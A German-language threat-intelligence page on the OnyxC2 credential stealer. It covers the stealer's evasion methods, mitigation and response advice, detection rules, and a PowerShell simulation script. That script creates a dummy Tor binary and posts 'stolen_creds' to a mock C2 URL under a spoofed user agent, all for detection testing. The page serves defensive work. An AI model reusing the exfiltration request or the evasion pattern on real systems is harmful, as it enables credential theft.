OnyxC2: Ein neuer Stealer, der 210 Anwendungen angreift
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
OnyxC2 ist ein aufstrebender Malware-as-a-Service Stealer, der entwickelt wurde, um Zugangsdaten, Zwei-Faktor-Authentifizierungserweiterungen und Kryptowährungs-Wallets in etwa 210 Anwendungen zu stehlen. Die Plattform bietet ein vollwertiges kommerzielles Toolkit, einschließlich eines Management-Panels, Builders und Remote-Zugriffsfunktionalität. Sie verlässt sich außerdem auf fortschrittliche Ausweichmethoden, darunter DLL-Sideloading mit übergroßen signierten Binaries und verschlüsselten Payload-Komponenten.
Untersuchung
BlackFog-Forscher untersuchten mehrere OnyxC2-Proben und entdeckten eine DLL-Sideloading-Methode, die ein signiertes Host-Executable zusammen mit einer bösartigen 120 MB+ DLL missbraucht, die als NVIDIA-Grafikbibliothek getarnt ist. Netzwerkanalysen zeigten, dass die Malware über HTTPS mit einem bestimmten Backend-API-Endpunkt kommuniziert. Die Forscher fanden auch verschlüsselte Overlays, die in die DLL eingebettet sind, was der Malware hilft, einer unkomplizierten statischen Analyse zu entgehen.
Minderung
Das Einsetzen von Anti-Daten-Exfiltrationskontrollen am Endpunkt kann helfen, unautorisierte ausgehende Datenübertragungen unabhängig vom verwendeten Prozess zu blockieren. Sicherheitsteams sollten auf verdächtige DLL-Ladungen achten, die mit signierten Binaries in Verbindung stehen, und ungewöhnlich große Dateien in benutzerbeschreibbaren Pfaden untersuchen. Starke Anwendungskontrollrichtlinien und die Überwachung unautorisierter geplante Aufgaben werden ebenfalls empfohlen.
Reaktion
Wenn OnyxC2-Aktivitäten entdeckt werden, isolieren Sie das betroffene System sofort, um weiteren Datendiebstahl zu stoppen. Erfassen Sie einen vollständigen Speicherdump, um die entschlüsselte Nutzlast wiederherzustellen, und prüfen Sie auf aktive HVNC-Sitzungen oder SOCKS5-Proxytätigkeit. Überprüfen Sie alle kürzlich erstellten geplanten Aufgaben und untersuchen Sie die Anmeldedaten speichernde Anwendungen auf Anzeichen einer Kompromittierung.
Angriffsflusssicherung
Erkennungen
Verdächtige Befehls- und Kontrollanfragen durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfragen (via DNS)
Ansicht
IOCs (HashSha256) zum Erkennen: Im Inneren von OnyxC2: Der neue Stealer, der 210 Apps ins Visier nimmt
Ansicht
IOCs (SourceIP) zum Erkennen: Im Inneren von OnyxC2: Der neue Stealer, der 210 Apps ins Visier nimmt
Ansicht
IOCs (DestinationIP) zum Erkennen: Im Inneren von OnyxC2: Der neue Stealer, der 210 Apps ins Visier nimmt
Ansicht
Erkennung der OnyxC2-Stealer C2-Kommunikation und TOR-Anonymisierung [Proxy]
Ansicht
Erkennung der OnyxC2-Geplanten-Aufgaben-Autorun- und Keylogger-Aktivität [Windows Prozess Erstellung]
Ansicht
Ausführung der Simulation
Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Adversary-Technik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffs Szenario & Befehle: Der Angreifer versucht, gestohlene Browser-Anmeldedaten zu exfiltrieren. Um der Erkennung durch Netzwerk-Sicherheitsüberwachung zu entgehen, setzt er ein tragbares Tor-Binary ein, um einen anonymisierten Tunnel zu erstellen. Sobald der Tunnel aufgebaut ist, initiiert die Malware eine Verbindung zu ihrem Befehls- und Kontrollserver (C2). Um sich in legitimen Webverkehr einzufügen, fälscht die Malware ihre User-Agent-Informationen, um wie ein „Cloudflare“-Zugangspunkt auszusehen, und zielt auf einen speziellen API-Endpunkt, der hinter einem Cloudflare-Proxy gehostet wird. Diese Sequenz ist darauf ausgelegt, die Korrelation des Erkennungsregelwerks
torvon Befehlszeilenparametern und dem speziellen/backend/api/app.phpURL-Muster auszulösen. -
Regressionstestskript:
# Simulation der OnyxC2-Stealer-Kommunikation # 1. Simulation der Anwesenheit von Tor (Erstellen eines Dummy-Datei/Prozessverhaltens) # In einem realen Szenario wäre dies das tatsächliche tor.exe $TorPath = "$env:TEMPtor.exe" "Simulierter Tor-Binary-Inhalt" | Out-File -FilePath $TorPath # Erstellen eines Prozessausführungsereignisses für 'tor' über die Befehlszeile Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # Um sicherzustellen, dass die Erkennungslogik 'command_line|contains: tor' trifft, # führen wir einen Befehl aus, der den String 'tor' enthält cmd.exe /c "echo initializing tor proxy..." # 2. Simulation der C2-Netzwerkverbindung # Wir verwenden PowerShell, um eine Netzwerkverbindung mit der speziellen URL und dem User-Agent zu simulieren $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Versuche C2-Kommunikation zu $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Säuberungsbefehle:
# Entfernen simulierte Artefakte Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Simulation Cleanup complete."